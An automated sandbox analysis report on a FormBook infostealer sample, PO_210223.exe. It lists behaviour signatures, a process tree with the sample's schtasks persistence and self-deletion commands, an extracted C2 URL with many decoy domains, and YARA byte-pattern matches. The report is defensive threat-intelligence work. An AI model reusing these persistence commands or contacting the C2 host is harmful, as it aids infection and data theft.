Play interactive tour

Edit tour

Analysis Report PO_210223.exe

Overview

General Information

Sample Name:	PO_210223.exe
Analysis ID:	356494
MD5:	e40af9745e938b72d5d860bbc679aebf
SHA1:	d9e750061417b0ca9f933db79c99c12934abbe84
SHA256:	38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
Tags:	exeFormbookgeoKOR
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

PO_210223.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\PO_210223.exe' MD5: E40AF9745E938B72D5D860BBC679AEBF)

schtasks.exe (PID: 1556 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PO_210223.exe (PID: 1868 cmdline: C:\Users\user\Desktop\PO_210223.exe MD5: E40AF9745E938B72D5D860BBC679AEBF)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

ipconfig.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 7112 cmdline: /c del 'C:\Users\user\Desktop\PO_210223.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.000666dy.com/ntg/"], "decoy": ["successwithyolandafgreen.com", "theordinaryph.com", "atamyo-therapeutics.com", "pophazard.com", "anthonyfultz.com", "pasanglham.com", "kanekhushi.com", "littlefishyswim.com", "kaieteurny.com", "fanavartima.com", "digexpo.com", "se-rto.com", "chaos.finance", "bakldx.com", "after-school.pro", "faithfromphilly.com", "estudiomuradian.com", "albertocerasini.com", "andronna.com", "wingspotusa.com", "lucky-lucky.online", "ga-don.com", "shawnbly.com", "shoptalullah.com", "needfulvegan.com", "ampersandaconsulting.com", "hoyhelp.com", "wickfordinternists.com", "kindlovingmindfulyoga.com", "hhkgjt.net", "eventpubgpharaoh.com", "blameitonpizza.com", "editshirt.com", "utulocal194.com", "meralpro.com", "rochesterhindus.com", "wadihassafi.com", "visitouroffice.com", "duncantraining.com", "ggrealestategroup.com", "xrf-tech.com", "pro-tizer.com", "usesoft.icu", "caralsalem.com", "inudaipur.com", "fluid-branding.com", "titizadiyamancigkofte.com", "es-tucasa.com", "103manningave.com", "eclat-beauty.info", "ahameeting2021.com", "gsyxh.com", "246835.com", "onwardfpv.com", "estasinvitado.net", "kinderkakery.com", "bala5.com", "gehqaralouine.com", "editorialesrd.com", "thebarconcepts.com", "aleitzeventdecor.com", "moderaty.com", "geraloqaresuine.com", "kyotodreaming.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x286798:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x286a02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b2db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b3022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x292525:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2beb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x292011:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2be631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x292627:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2bec47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x29279f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bedbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x28741a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2b3a3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x29128c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2bd8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x288113:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2b4733:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2981c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2c47e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2991ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2952a9:$sqlite3step: 68 34 1C 7B E1 0x2953bc:$sqlite3step: 68 34 1C 7B E1 0x2c18c9:$sqlite3step: 68 34 1C 7B E1 0x2c19dc:$sqlite3step: 68 34 1C 7B E1 0x2952d8:$sqlite3text: 68 38 2A 90 C5 0x2953fd:$sqlite3text: 68 38 2A 90 C5 0x2c18f8:$sqlite3text: 68 38 2A 90 C5 0x2c1a1d:$sqlite3text: 68 38 2A 90 C5 0x2952eb:$sqlite3blob: 68 53 D8 7F 8C 0x295413:$sqlite3blob: 68 53 D8 7F 8C 0x2c190b:$sqlite3blob: 68 53 D8 7F 8C 0x2c1a33:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: PO_210223.exe PID: 6976	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO_210223.exe.2cb671c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.PO_210223.exe.45c8e00.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO_210223.exe.45c8e00.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe6998:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe6c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x112fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x113222:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf2725:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11ed45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf2211:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11e831:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf2827:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11ee47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf299f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11efbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe761a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x113c3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf148c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11daac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xe8313:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x114933:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf83c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1249e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xf93ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO_210223.exe.45c8e00.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf54a9:$sqlite3step: 68 34 1C 7B E1 0xf55bc:$sqlite3step: 68 34 1C 7B E1 0x121ac9:$sqlite3step: 68 34 1C 7B E1 0x121bdc:$sqlite3step: 68 34 1C 7B E1 0xf54d8:$sqlite3text: 68 38 2A 90 C5 0xf55fd:$sqlite3text: 68 38 2A 90 C5 0x121af8:$sqlite3text: 68 38 2A 90 C5 0x121c1d:$sqlite3text: 68 38 2A 90 C5 0xf54eb:$sqlite3blob: 68 53 D8 7F 8C 0xf5613:$sqlite3blob: 68 53 D8 7F 8C 0x121b0b:$sqlite3blob: 68 53 D8 7F 8C 0x121c33:$sqlite3blob: 68 53 D8 7F 8C
9.2.PO_210223.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.PO_210223.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.PO_210223.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
9.2.PO_210223.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.PO_210223.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.PO_210223.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0.2.PO_210223.exe.4573fe0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO_210223.exe.4573fe0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13b7b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13ba22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x167dd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x168042:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x173b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x147031:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x173651:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x173c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1477bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x173ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13c43a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168a5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1462ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1728cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13d133:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x169753:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14d1e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x179807:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14e1ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO_210223.exe.4573fe0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x14a2c9:$sqlite3step: 68 34 1C 7B E1 0x14a3dc:$sqlite3step: 68 34 1C 7B E1 0x1768e9:$sqlite3step: 68 34 1C 7B E1 0x1769fc:$sqlite3step: 68 34 1C 7B E1 0x14a2f8:$sqlite3text: 68 38 2A 90 C5 0x14a41d:$sqlite3text: 68 38 2A 90 C5 0x176918:$sqlite3text: 68 38 2A 90 C5 0x176a3d:$sqlite3text: 68 38 2A 90 C5 0x14a30b:$sqlite3blob: 68 53 D8 7F 8C 0x14a433:$sqlite3blob: 68 53 D8 7F 8C 0x17692b:$sqlite3blob: 68 53 D8 7F 8C 0x176a53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\PO_210223.exe' , ParentImage: C:\Users\user\Desktop\PO_210223.exe, ParentProcessId: 6976, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', ProcessId: 1556

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.000666dy.com/ntg/"], "decoy": ["successwithyolandafgreen.com", "theordinaryph.com", "atamyo-therapeutics.com", "pophazard.com", "anthonyfultz.com", "pasanglham.com", "kanekhushi.com", "littlefishyswim.com", "kaieteurny.com", "fanavartima.com", "digexpo.com", "se-rto.com", "chaos.finance", "bakldx.com", "after-school.pro", "faithfromphilly.com", "estudiomuradian.com", "albertocerasini.com", "andronna.com", "wingspotusa.com", "lucky-lucky.online", "ga-don.com", "shawnbly.com", "shoptalullah.com", "needfulvegan.com", "ampersandaconsulting.com", "hoyhelp.com", "wickfordinternists.com", "kindlovingmindfulyoga.com", "hhkgjt.net", "eventpubgpharaoh.com", "blameitonpizza.com", "editshirt.com", "utulocal194.com", "meralpro.com", "rochesterhindus.com", "wadihassafi.com", "visitouroffice.com", "duncantraining.com", "ggrealestategroup.com", "xrf-tech.com", "pro-tizer.com", "usesoft.icu", "caralsalem.com", "inudaipur.com", "fluid-branding.com", "titizadiyamancigkofte.com", "es-tucasa.com", "103manningave.com", "eclat-beauty.info", "ahameeting2021.com", "gsyxh.com", "246835.com", "onwardfpv.com", "estasinvitado.net", "kinderkakery.com", "bala5.com", "gehqaralouine.com", "editorialesrd.com", "thebarconcepts.com", "aleitzeventdecor.com", "moderaty.com", "geraloqaresuine.com", "kyotodreaming.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\kwqifureL.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Show sources

Source: PO_210223.exe	Virustotal: Detection: 31%			Perma Link
Source: PO_210223.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
